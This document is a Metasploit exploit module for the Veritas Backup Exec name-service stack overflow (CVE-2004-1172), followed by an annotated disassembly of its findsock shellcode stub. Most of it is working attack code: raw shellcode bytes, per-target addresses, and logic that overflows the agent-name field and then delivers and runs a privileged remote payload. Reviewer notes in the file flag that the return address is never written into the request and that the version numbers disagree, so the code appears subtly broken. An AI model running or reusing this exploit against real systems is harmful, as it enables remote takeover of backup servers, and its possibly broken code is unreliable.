##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
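class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Veritas Backup Exec Agent Browser (bnetns) name-service stack overflow,
  # CVE-2004-1172. Two-staged: an oversized agent name in a registration
  # request carries a 51-byte findsock/read stub; that stub recv()s the
  # real payload over the same connection and jumps to it.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Name Service Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the Veritas Backup
          Exec Agent Browser service. This vulnerability occurs when a
          recv() call has a length value too long for the destination
          stack buffer. By sending an agent name value of 63 bytes or
          more, we can overwrite the return address of the recv
          function. Since we only have ~60 bytes of contiguous space
          for shellcode, a tiny findsock payload is sent which uses a
          hardcoded IAT address for the recv() function. This payload
          will then roll the stack back to the beginning of the page,
          recv() the real shellcode into it, and jump to it. This
          module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
          8.6.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1172'],
          [ 'OSVDB', '12418'],
          [ 'BID', '11974'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
        ],
        # The service runs with elevated rights, so the payload does too.
        'Privileged' => true,
        # The real payload is delivered by the stub's recv(), not inside the
        # overflow itself, so it is not limited to the ~60 bytes of the
        # agent-name field. The stub rolls ESP back to a page boundary before
        # receiving, hence the large negative StackAdjustment.
        'Payload' => {
          'Space' => 1024,
          'MinNops' => 512,
          'StackAdjustment' => -3500
        },
        # Per target: Rets[0] is the return-address value for that build,
        # Rets[1] is the address of the recv() IAT slot in bnetns stored
        # pre-shifted (slot << 8 | 0xFF) so it contains no NUL byte; the stub
        # shifts it back with 'shr eax, 8' (see exploit and __END__).
        'Targets' => [
          [
            'Veritas BE 9.1 SP0/SP1', # return contributed by class101
            {
              'Platform' => 'win',
              'Rets' => [ 0x0142ffa1, 0x401150FF ] # build v9.1.4691.0
            },
          ],
          # NOTE(review): the description says "8.6" was tested, but this
          # target is labelled 8.5 / v8.50.3572 - one of the two is probably
          # a typo; confirm against the tested build.
          [
            'Veritas BE 8.5',
            {
              'Platform' => 'win',
              'Rets' => [ 0x014308b9, 0x401138FF ] # build v8.50.3572
            },
          ],
        ],
        'DisclosureDate' => '2004-12-16',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6101)
      ]
    )
  end

  # Sends the overlong registration request (carrying the findsock stub),
  # then pushes the real payload down the same socket for the stub to
  # recv(). All request bytes are built as binary strings so the byte
  # offsets patched below hold regardless of the source file's encoding.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # First stage: a 51-byte findsock/read stub (disassembly after __END__).
    # It page-aligns ESP, then tries recv() on descriptors counting down from
    # ESI through a hard-coded IAT slot in bnetns until a call returns without
    # error, and jumps to the received bytes. The IAT address is held
    # pre-shifted left by 8 bits (0x00401150 -> 0x401150FF) so the immediate
    # has no NUL; the stub undoes the shift with 'shr eax, 8'.
    #
    # The last three bytes are the back-edge displacement of 'jnz' (0xE1)
    # and the final 'call edi' (0xFF 0xD7). They must be present: otherwise
    # the jnz takes its displacement from the 0xFC filler that follows and
    # the received payload is never called.
    stage_read =
      "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74".b +
      "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11".b +
      "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75".b +
      "\xe1\xff\xd7".b

    # Patch the per-target (pre-shifted) recv() IAT address into the
    # 'mov eax, imm32' at stub offset 28; the immediate occupies bytes 29..32.
    stage_read[29, 4] = [ target['Rets'][1] ].pack('V')

    # The agent-name field: two leading 'cld' bytes, the stub, and 0xFC
    # filler so the name is long enough to overflow the stack buffer.
    stage_code = "\xfc".b * 112
    stage_code[2, stage_read.bytesize] = stage_read

    # NOTE(review): target['Rets'][0] is never written into the request in
    # this code; whatever reaches the saved return address would presumably
    # be 0xFC filler. Confirm against the upstream module whether a splice
    # of Rets[0] at the overwrite offset was lost here.

    # Registration request: 6-byte header, the overlong agent name, a NUL,
    # a dummy dotted address string, and a trailing 'jmp short -127'.
    # The request is 133 bytes, so measured from the byte after that jmp
    # it lands on offset 6 - the first byte of stage_code. Control that
    # reaches the tail of the received data therefore ends up in the stub.
    req =
      "\x02\x00\x32\x00\x20\x00".b + stage_code + "\x00".b +
      "1.1.1.1.1.1\x00".b + "\xeb\x81".b

    print_status("Sending the agent registration request of #{req.bytesize} bytes...")
    sock.put(req)

    # The stub's recv() reads this from the same connection.
    print_status('Sending the payload stage down the socket...')
    sock.put(payload.encoded)

    # Give the stub time to brute-force the descriptor and run the payload
    # before the handler checks for a session.
    print_status('Waiting for the payload to execute...')
    select(nil, nil, nil, 2)

    handler
    disconnect
  end
end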
__END__
[ findsock stage ]
; Annotated listing of stage_read (0x33 = 51 bytes). The stub page-aligns
; ESP, then retries recv() on descriptors counting down from ESI until a
; call returns a non-negative value, and jumps to the received bytes.
; Bytes 29..32 (the imm32 of 'mov eax') are patched per target.
00000000 31F6 xor esi,esi                ; ESI is reassigned at 0x0E before use
00000002 C1EC0C shr esp,0xc              ; round ESP down to a 4 KiB page
00000005 C1E40C shl esp,0xc              ;   boundary
00000008 89E7 mov edi,esp                ; EDI = receive buffer (the page start)
0000000A 89FB mov ebx,edi                ; EBX = ESP value to restore each retry
0000000C 6A01 push byte +0x1             ; [ESP] = 01 00 00 00
0000000E 8B7424FE mov esi,[esp-0x2]      ; ESI = 0x0001xxxx: high half from the
                                         ;   pushed 1, low half from the two bytes
                                         ;   just below it (starting fd guess;
                                         ;   intent of the low bytes unclear - confirm)
00000012 31D2 xor edx,edx                ; loop: recv(ESI, EDI, 0x10000, 0)
00000014 52 push edx                     ;   flags = 0
00000015 42 inc edx
00000016 C1E210 shl edx,0x10             ;   EDX = 0x10000
00000019 52 push edx                     ;   len = 0x10000
0000001A 57 push edi                     ;   buf = EDI
0000001B 56 push esi                     ;   s = ESI
0000001C B8FF501140 mov eax,0x401150ff   ; IAT slot << 8 | 0xFF (no NUL bytes);
                                         ;   overwritten per target via stage_read[29,4]
00000021 C1E808 shr eax,0x8              ; EAX = 0x00401150, the recv() IAT entry
00000024 FF10 call near [eax]            ; recv(...)
00000026 85C0 test eax,eax
00000028 7907 jns 0x31                   ; result >= 0: run what landed in EDI
0000002A 89DC mov esp,ebx                ; error: reset ESP to the saved page boundary
0000002C 4E dec esi                      ; try the next lower descriptor
0000002D 85F6 test esi,esi
0000002F 75E1 jnz 0x12                   ;   ... until ESI reaches 0
00000031 FFD7 call edi                   ; execute the received payload